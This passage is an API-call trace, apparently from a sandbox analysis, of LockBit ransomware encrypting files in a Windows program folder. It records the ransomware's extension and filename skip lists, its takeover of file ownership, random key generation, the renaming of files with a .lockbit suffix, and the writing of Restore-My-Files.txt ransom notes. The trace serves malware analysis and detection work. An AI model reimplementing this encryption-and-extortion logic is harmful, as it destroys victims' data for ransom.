Files\\DVD Maker\\Shared\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0097.419] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93e437ad, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x93e437ad, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x689cd275, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8edf, dwReserved0=0x523728, dwReserved1=0x0, cFileName="Parity.fx", cAlternateFileName="")) returned 1 [0097.419] lstrcmpiW (lpString1=".", lpString2="Parity.fx") returned -1 [0097.419] lstrcmpiW (lpString1="..", lpString2="Parity.fx") returned -1 [0097.419] PathFindExtensionW (pszPath="Parity.fx") returned=".fx" [0097.419] lstrcmpiW (lpString1=".386", lpString2=".fx") returned -1 [0097.419] lstrcmpiW (lpString1=".cmd", lpString2=".fx") returned -1 [0097.419] lstrcmpiW (lpString1=".exe", lpString2=".fx") returned -1 [0097.419] lstrcmpiW (lpString1=".ani", lpString2=".fx") returned -1 [0097.419] lstrcmpiW (lpString1=".adv", lpString2=".fx") returned -1 [0097.419] lstrcmpiW (lpString1=".theme", lpString2=".fx") returned 1 [0097.419] lstrcmpiW (lpString1=".msi", lpString2=".fx") returned 1 [0097.419] lstrcmpiW (lpString1=".msp", lpString2=".fx") returned 1 [0097.419] lstrcmpiW (lpString1=".com", lpString2=".fx") returned -1 [0097.419] lstrcmpiW (lpString1=".diagpkg", lpString2=".fx") returned -1 [0097.420] lstrcmpiW (lpString1=".nls", lpString2=".fx") returned 1 [0097.420] lstrcmpiW (lpString1=".diagcab", lpString2=".fx") returned -1 [0097.420] lstrcmpiW (lpString1=".lock", lpString2=".fx") returned 1 [0097.420] lstrcmpiW (lpString1=".ocx", lpString2=".fx") returned 1 [0097.420] lstrcmpiW (lpString1=".mpa", lpString2=".fx") returned 1 [0097.420] lstrcmpiW (lpString1=".cpl", lpString2=".fx") returned -1 [0097.420] lstrcmpiW (lpString1=".mod", lpString2=".fx") returned 1 [0097.420] lstrcmpiW (lpString1=".hta", lpString2=".fx") returned 1 [0097.420] lstrcmpiW (lpString1=".icns", lpString2=".fx") returned 1 [0097.420] lstrcmpiW (lpString1=".prf", lpString2=".fx") returned 1 [0097.420] lstrcmpiW (lpString1=".rtp", lpString2=".fx") returned 1 [0097.420] lstrcmpiW (lpString1=".diagcfg", lpString2=".fx") returned -1 [0097.420] lstrcmpiW (lpString1=".msstyles", lpString2=".fx") returned 1 [0097.420] lstrcmpiW (lpString1=".bin", lpString2=".fx") returned -1 [0097.420] lstrcmpiW (lpString1=".hlp", lpString2=".fx") returned 1 [0097.420] lstrcmpiW (lpString1=".shs", lpString2=".fx") returned 1 [0097.420] lstrcmpiW (lpString1=".drv", lpString2=".fx") returned -1 [0097.420] lstrcmpiW (lpString1=".wpx", lpString2=".fx") returned 1 [0097.420] lstrcmpiW (lpString1=".bat", lpString2=".fx") returned -1 [0097.420] lstrcmpiW (lpString1=".rom", lpString2=".fx") returned 1 [0097.420] lstrcmpiW (lpString1=".msc", lpString2=".fx") returned 1 [0097.420] lstrcmpiW (lpString1=".spl", lpString2=".fx") returned 1 [0097.420] lstrcmpiW (lpString1=".ps1", lpString2=".fx") returned 1 [0097.420] lstrcmpiW (lpString1=".msu", lpString2=".fx") returned 1 [0097.421] lstrcmpiW (lpString1=".ics", lpString2=".fx") returned 1 [0097.421] lstrcmpiW (lpString1=".key", lpString2=".fx") returned 1 [0097.421] lstrcmpiW (lpString1=".mp3", lpString2=".fx") returned 1 [0097.421] lstrcmpiW (lpString1=".reg", lpString2=".fx") returned 1 [0097.421] lstrcmpiW (lpString1=".dll", lpString2=".fx") returned -1 [0097.421] lstrcmpiW (lpString1=".ini", lpString2=".fx") returned 1 [0097.421] lstrcmpiW (lpString1=".idx", lpString2=".fx") returned 1 [0097.421] lstrcmpiW (lpString1=".sys", lpString2=".fx") returned 1 [0097.421] lstrcmpiW (lpString1=".hlp", lpString2=".fx") returned 1 [0097.421] lstrcmpiW (lpString1=".ico", lpString2=".fx") returned 1 [0097.421] lstrcmpiW (lpString1=".lnk", lpString2=".fx") returned 1 [0097.421] lstrcmpiW (lpString1=".rdp", lpString2=".fx") returned 1 [0097.421] lstrcmpiW (lpString1=".lockbit", lpString2=".fx") returned 1 [0097.421] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Parity.fx") returned 1 [0097.421] lstrcmpiW (lpString1="ntldr", lpString2="Parity.fx") returned -1 [0097.421] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Parity.fx") returned -1 [0097.421] lstrcmpiW (lpString1="bootsect.bak", lpString2="Parity.fx") returned -1 [0097.421] lstrcmpiW (lpString1="autorun.inf", lpString2="Parity.fx") returned -1 [0097.421] lstrcmpiW (lpString1="thumbs.db", lpString2="Parity.fx") returned 1 [0097.421] lstrcmpiW (lpString1="iconcache.db", lpString2="Parity.fx") returned -1 [0097.421] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\") returned="" [0097.421] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\Parity.fx") returned=".fx" [0097.421] lstrcmpiW (lpString1=".rar", lpString2=".fx") returned 1 [0097.422] lstrcmpiW (lpString1=".zip", lpString2=".fx") returned 1 [0097.422] lstrcmpiW (lpString1=".7z", lpString2=".fx") returned -1 [0097.422] lstrcmpiW (lpString1=".ckp", lpString2=".fx") returned -1 [0097.422] lstrcmpiW (lpString1=".dacpac", lpString2=".fx") returned -1 [0097.422] lstrcmpiW (lpString1=".db", lpString2=".fx") returned -1 [0097.422] lstrcmpiW (lpString1=".db-shm", lpString2=".fx") returned -1 [0097.422] lstrcmpiW (lpString1=".db-wal", lpString2=".fx") returned -1 [0097.422] lstrcmpiW (lpString1=".db3", lpString2=".fx") returned -1 [0097.422] lstrcmpiW (lpString1=".dbf", lpString2=".fx") returned -1 [0097.422] lstrcmpiW (lpString1=".dbc", lpString2=".fx") returned -1 [0097.422] lstrcmpiW (lpString1=".dbs", lpString2=".fx") returned -1 [0097.422] lstrcmpiW (lpString1=".dbt", lpString2=".fx") returned -1 [0097.422] lstrcmpiW (lpString1=".dbv", lpString2=".fx") returned -1 [0097.422] lstrcmpiW (lpString1=".frm", lpString2=".fx") returned -1 [0097.422] lstrcmpiW (lpString1=".mdf", lpString2=".fx") returned 1 [0097.422] lstrcmpiW (lpString1=".mrg", lpString2=".fx") returned 1 [0097.422] lstrcmpiW (lpString1=".mwb", lpString2=".fx") returned 1 [0097.422] lstrcmpiW (lpString1=".myd", lpString2=".fx") returned 1 [0097.422] lstrcmpiW (lpString1=".ndf", lpString2=".fx") returned 1 [0097.422] lstrcmpiW (lpString1=".qry", lpString2=".fx") returned 1 [0097.422] lstrcmpiW (lpString1=".sdb", lpString2=".fx") returned 1 [0097.422] lstrcmpiW (lpString1=".sdf", lpString2=".fx") returned 1 [0097.422] lstrcmpiW (lpString1=".sql", lpString2=".fx") returned 1 [0097.422] lstrcmpiW (lpString1=".sqlite", lpString2=".fx") returned 1 [0097.422] lstrcmpiW (lpString1=".sqlite3", lpString2=".fx") returned 1 [0097.423] lstrcmpiW (lpString1=".sqlitedb", lpString2=".fx") returned 1 [0097.423] lstrcmpiW (lpString1=".tmd", lpString2=".fx") returned 1 [0097.423] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\Parity.fx.lockbit") returned 52 [0097.423] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\Parity.fx" (normalized: "c:\\program files\\dvd maker\\shared\\parity.fx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0097.425] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0097.426] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0097.426] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0097.428] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0097.429] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0097.430] RtlFreeAnsiString (AnsiString="\\") [0097.430] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6c530 | out: TokenHandle=0x3d6c530*=0x3b4) returned 0x0 [0097.430] malloc (_Size=0x200) returned 0x77d800 [0097.430] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6c528 | out: TokenInformation=0x77d800, ReturnLength=0x3d6c528) returned 0x0 [0097.430] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6c2e4, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6c2e4) returned 1 [0097.430] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6c2e4, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6c2e4) returned 1 [0097.430] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\Parity.fx", SecurityInformation=0x1, pSecurityDescriptor=0x3d6c2e4) returned 1 [0097.431] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\Parity.fx", SecurityInformation=0x4, pSecurityDescriptor=0x3d6c2e4) returned 1 [0097.431] CloseHandle (hObject=0x3b4) returned 1 [0097.432] free (_Block=0x77d800) [0097.432] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\Parity.fx" (normalized: "c:\\program files\\dvd maker\\shared\\parity.fx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0097.432] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0097.432] malloc (_Size=0x40068) returned 0x3df0008 [0097.432] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=36575) returned 1 [0097.432] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.435] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.435] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0097.435] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.437] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0097.438] ReadFile (in: hFile=0x3b4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0097.451] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\Parity.fx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\Parity.fx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0097.451] malloc (_Size=0x7e) returned 0x77e5e0 [0097.451] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6c2dc, FileInformation=0x77e5e0, Length=0x7e, FileInformationClass=0xa) returned 0x0 [0097.451] free (_Block=0x77e5e0) [0097.451] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\Parity.fx" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared") returned 1 [0097.451] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\Restore-My-Files.txt") returned 55 [0097.452] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0097.452] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93e437ad, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x93e437ad, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x689cd275, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8edf, dwReserved0=0x523728, dwReserved1=0x0, cFileName="Parity.fx", cAlternateFileName="")) returned 0 [0097.452] FindClose (in: hFindFile=0x55fdf8 | out: hFindFile=0x55fdf8) returned 1 [0097.452] FindNextFileW (in: hFindFile=0x55fdb8, lpFindFileData=0x3d6d598 | out: lpFindFileData=0x3d6d598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0c03b3f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0c03b3f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0c03b3f, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x13600, dwReserved0=0x0, dwReserved1=0x0, cFileName="soniccolorconverter.ax", cAlternateFileName="")) returned 1 [0097.452] lstrcmpiW (lpString1=".", lpString2="soniccolorconverter.ax") returned -1 [0097.452] lstrcmpiW (lpString1="..", lpString2="soniccolorconverter.ax") returned -1 [0097.452] PathFindExtensionW (pszPath="soniccolorconverter.ax") returned=".ax" [0097.452] lstrcmpiW (lpString1=".386", lpString2=".ax") returned -1 [0097.452] lstrcmpiW (lpString1=".cmd", lpString2=".ax") returned 1 [0097.452] lstrcmpiW (lpString1=".exe", lpString2=".ax") returned 1 [0097.452] lstrcmpiW (lpString1=".ani", lpString2=".ax") returned -1 [0097.452] lstrcmpiW (lpString1=".adv", lpString2=".ax") returned -1 [0097.452] lstrcmpiW (lpString1=".theme", lpString2=".ax") returned 1 [0097.452] lstrcmpiW (lpString1=".msi", lpString2=".ax") returned 1 [0097.453] lstrcmpiW (lpString1=".msp", lpString2=".ax") returned 1 [0097.453] lstrcmpiW (lpString1=".com", lpString2=".ax") returned 1 [0097.453] lstrcmpiW (lpString1=".diagpkg", lpString2=".ax") returned 1 [0097.453] lstrcmpiW (lpString1=".nls", lpString2=".ax") returned 1 [0097.453] lstrcmpiW (lpString1=".diagcab", lpString2=".ax") returned 1 [0097.453] lstrcmpiW (lpString1=".lock", lpString2=".ax") returned 1 [0097.453] lstrcmpiW (lpString1=".ocx", lpString2=".ax") returned 1 [0097.453] lstrcmpiW (lpString1=".mpa", lpString2=".ax") returned 1 [0097.453] lstrcmpiW (lpString1=".cpl", lpString2=".ax") returned 1 [0097.453] lstrcmpiW (lpString1=".mod", lpString2=".ax") returned 1 [0097.453] lstrcmpiW (lpString1=".hta", lpString2=".ax") returned 1 [0097.453] lstrcmpiW (lpString1=".icns", lpString2=".ax") returned 1 [0097.453] lstrcmpiW (lpString1=".prf", lpString2=".ax") returned 1 [0097.453] lstrcmpiW (lpString1=".rtp", lpString2=".ax") returned 1 [0097.453] lstrcmpiW (lpString1=".diagcfg", lpString2=".ax") returned 1 [0097.453] lstrcmpiW (lpString1=".msstyles", lpString2=".ax") returned 1 [0097.453] lstrcmpiW (lpString1=".bin", lpString2=".ax") returned 1 [0097.453] lstrcmpiW (lpString1=".hlp", lpString2=".ax") returned 1 [0097.453] lstrcmpiW (lpString1=".shs", lpString2=".ax") returned 1 [0097.453] lstrcmpiW (lpString1=".drv", lpString2=".ax") returned 1 [0097.453] lstrcmpiW (lpString1=".wpx", lpString2=".ax") returned 1 [0097.453] lstrcmpiW (lpString1=".bat", lpString2=".ax") returned 1 [0097.454] lstrcmpiW (lpString1=".rom", lpString2=".ax") returned 1 [0097.454] lstrcmpiW (lpString1=".msc", lpString2=".ax") returned 1 [0097.454] lstrcmpiW (lpString1=".spl", lpString2=".ax") returned 1 [0097.454] lstrcmpiW (lpString1=".ps1", lpString2=".ax") returned 1 [0097.454] lstrcmpiW (lpString1=".msu", lpString2=".ax") returned 1 [0097.454] lstrcmpiW (lpString1=".ics", lpString2=".ax") returned 1 [0097.454] lstrcmpiW (lpString1=".key", lpString2=".ax") returned 1 [0097.454] lstrcmpiW (lpString1=".mp3", lpString2=".ax") returned 1 [0097.454] lstrcmpiW (lpString1=".reg", lpString2=".ax") returned 1 [0097.454] lstrcmpiW (lpString1=".dll", lpString2=".ax") returned 1 [0097.454] lstrcmpiW (lpString1=".ini", lpString2=".ax") returned 1 [0097.454] lstrcmpiW (lpString1=".idx", lpString2=".ax") returned 1 [0097.454] lstrcmpiW (lpString1=".sys", lpString2=".ax") returned 1 [0097.454] lstrcmpiW (lpString1=".hlp", lpString2=".ax") returned 1 [0097.454] lstrcmpiW (lpString1=".ico", lpString2=".ax") returned 1 [0097.454] lstrcmpiW (lpString1=".lnk", lpString2=".ax") returned 1 [0097.454] lstrcmpiW (lpString1=".rdp", lpString2=".ax") returned 1 [0097.454] lstrcmpiW (lpString1=".lockbit", lpString2=".ax") returned 1 [0097.454] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="soniccolorconverter.ax") returned -1 [0097.454] lstrcmpiW (lpString1="ntldr", lpString2="soniccolorconverter.ax") returned -1 [0097.454] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="soniccolorconverter.ax") returned -1 [0097.454] lstrcmpiW (lpString1="bootsect.bak", lpString2="soniccolorconverter.ax") returned -1 [0097.455] lstrcmpiW (lpString1="autorun.inf", lpString2="soniccolorconverter.ax") returned -1 [0097.455] lstrcmpiW (lpString1="thumbs.db", lpString2="soniccolorconverter.ax") returned 1 [0097.455] lstrcmpiW (lpString1="iconcache.db", lpString2="soniccolorconverter.ax") returned -1 [0097.455] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker" | out: pszPath="C:\\\\Program Files\\DVD Maker\\") returned="" [0097.455] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\soniccolorconverter.ax") returned=".ax" [0097.455] lstrcmpiW (lpString1=".rar", lpString2=".ax") returned 1 [0097.455] lstrcmpiW (lpString1=".zip", lpString2=".ax") returned 1 [0097.455] lstrcmpiW (lpString1=".7z", lpString2=".ax") returned -1 [0097.455] lstrcmpiW (lpString1=".ckp", lpString2=".ax") returned 1 [0097.455] lstrcmpiW (lpString1=".dacpac", lpString2=".ax") returned 1 [0097.455] lstrcmpiW (lpString1=".db", lpString2=".ax") returned 1 [0097.455] lstrcmpiW (lpString1=".db-shm", lpString2=".ax") returned 1 [0097.455] lstrcmpiW (lpString1=".db-wal", lpString2=".ax") returned 1 [0097.455] lstrcmpiW (lpString1=".db3", lpString2=".ax") returned 1 [0097.455] lstrcmpiW (lpString1=".dbf", lpString2=".ax") returned 1 [0097.455] lstrcmpiW (lpString1=".dbc", lpString2=".ax") returned 1 [0097.455] lstrcmpiW (lpString1=".dbs", lpString2=".ax") returned 1 [0097.455] lstrcmpiW (lpString1=".dbt", lpString2=".ax") returned 1 [0097.455] lstrcmpiW (lpString1=".dbv", lpString2=".ax") returned 1 [0097.455] lstrcmpiW (lpString1=".frm", lpString2=".ax") returned 1 [0097.455] lstrcmpiW (lpString1=".mdf", lpString2=".ax") returned 1 [0097.456] lstrcmpiW (lpString1=".mrg", lpString2=".ax") returned 1 [0097.456] lstrcmpiW (lpString1=".mwb", lpString2=".ax") returned 1 [0097.456] lstrcmpiW (lpString1=".myd", lpString2=".ax") returned 1 [0097.456] lstrcmpiW (lpString1=".ndf", lpString2=".ax") returned 1 [0097.456] lstrcmpiW (lpString1=".qry", lpString2=".ax") returned 1 [0097.456] lstrcmpiW (lpString1=".sdb", lpString2=".ax") returned 1 [0097.456] lstrcmpiW (lpString1=".sdf", lpString2=".ax") returned 1 [0097.456] lstrcmpiW (lpString1=".sql", lpString2=".ax") returned 1 [0097.456] lstrcmpiW (lpString1=".sqlite", lpString2=".ax") returned 1 [0097.456] lstrcmpiW (lpString1=".sqlite3", lpString2=".ax") returned 1 [0097.456] lstrcmpiW (lpString1=".sqlitedb", lpString2=".ax") returned 1 [0097.456] lstrcmpiW (lpString1=".tmd", lpString2=".ax") returned 1 [0097.456] wsprintfW (in: param_1=0x3d6cae0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\soniccolorconverter.ax.lockbit") returned 58 [0097.456] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\soniccolorconverter.ax" (normalized: "c:\\program files\\dvd maker\\soniccolorconverter.ax"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0097.458] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0097.460] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0097.473] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0097.475] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0097.476] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0097.476] RtlFreeAnsiString (AnsiString="\\") [0097.476] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6d158 | out: TokenHandle=0x3d6d158*=0x3b0) returned 0x0 [0097.476] malloc (_Size=0x200) returned 0x77d800 [0097.477] NtQueryInformationToken (in: TokenHandle=0x3b0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6d150 | out: TokenInformation=0x77d800, ReturnLength=0x3d6d150) returned 0x0 [0097.477] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6cf0c, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6cf0c) returned 1 [0097.477] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6cf0c, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6cf0c) returned 1 [0097.477] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\soniccolorconverter.ax", SecurityInformation=0x1, pSecurityDescriptor=0x3d6cf0c) returned 1 [0097.478] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\soniccolorconverter.ax", SecurityInformation=0x4, pSecurityDescriptor=0x3d6cf0c) returned 1 [0097.478] CloseHandle (hObject=0x3b0) returned 1 [0097.478] free (_Block=0x77d800) [0097.478] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\soniccolorconverter.ax" (normalized: "c:\\program files\\dvd maker\\soniccolorconverter.ax"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b0 [0097.478] CreateIoCompletionPort (FileHandle=0x3b0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0097.478] malloc (_Size=0x40068) returned 0x1ff1e60 [0097.478] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=79360) returned 1 [0097.479] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.481] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.481] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0097.481] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.484] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.484] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0097.484] ReadFile (in: hFile=0x3b0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0097.497] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\soniccolorconverter.ax.lockbit", NtPathName=0x3d6d138, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\soniccolorconverter.ax.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0097.497] malloc (_Size=0x8a) returned 0x2073f40 [0097.498] NtSetInformationFile (FileHandle=0x3b0, IoStatusBlock=0x3d6cf04, FileInformation=0x2073f40, Length=0x8a, FileInformationClass=0xa) returned 0x0 [0097.498] free (_Block=0x2073f40) [0097.498] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\soniccolorconverter.ax" | out: pszPath="C:\\\\Program Files\\DVD Maker") returned 1 [0097.498] wsprintfW (in: param_1=0x3d6ccf0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Restore-My-Files.txt") returned 48 [0097.498] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0097.498] FindNextFileW (in: hFindFile=0x55fdb8, lpFindFileData=0x3d6d598 | out: lpFindFileData=0x3d6d598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0bdd9df, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0bdd9df, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0bdd9df, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xca00, dwReserved0=0x0, dwReserved1=0x0, cFileName="sonicsptransform.ax", cAlternateFileName="")) returned 1 [0097.499] lstrcmpiW (lpString1=".", lpString2="sonicsptransform.ax") returned -1 [0097.499] lstrcmpiW (lpString1="..", lpString2="sonicsptransform.ax") returned -1 [0097.499] PathFindExtensionW (pszPath="sonicsptransform.ax") returned=".ax" [0097.499] lstrcmpiW (lpString1=".386", lpString2=".ax") returned -1 [0097.499] lstrcmpiW (lpString1=".cmd", lpString2=".ax") returned 1 [0097.499] lstrcmpiW (lpString1=".exe", lpString2=".ax") returned 1 [0097.499] lstrcmpiW (lpString1=".ani", lpString2=".ax") returned -1 [0097.499] lstrcmpiW (lpString1=".adv", lpString2=".ax") returned -1 [0097.499] lstrcmpiW (lpString1=".theme", lpString2=".ax") returned 1 [0097.499] lstrcmpiW (lpString1=".msi", lpString2=".ax") returned 1 [0097.499] lstrcmpiW (lpString1=".msp", lpString2=".ax") returned 1 [0097.499] lstrcmpiW (lpString1=".com", lpString2=".ax") returned 1 [0097.499] lstrcmpiW (lpString1=".diagpkg", lpString2=".ax") returned 1 [0097.499] lstrcmpiW (lpString1=".nls", lpString2=".ax") returned 1 [0097.499] lstrcmpiW (lpString1=".diagcab", lpString2=".ax") returned 1 [0097.499] lstrcmpiW (lpString1=".lock", lpString2=".ax") returned 1 [0097.499] lstrcmpiW (lpString1=".ocx", lpString2=".ax") returned 1 [0097.499] lstrcmpiW (lpString1=".mpa", lpString2=".ax") returned 1 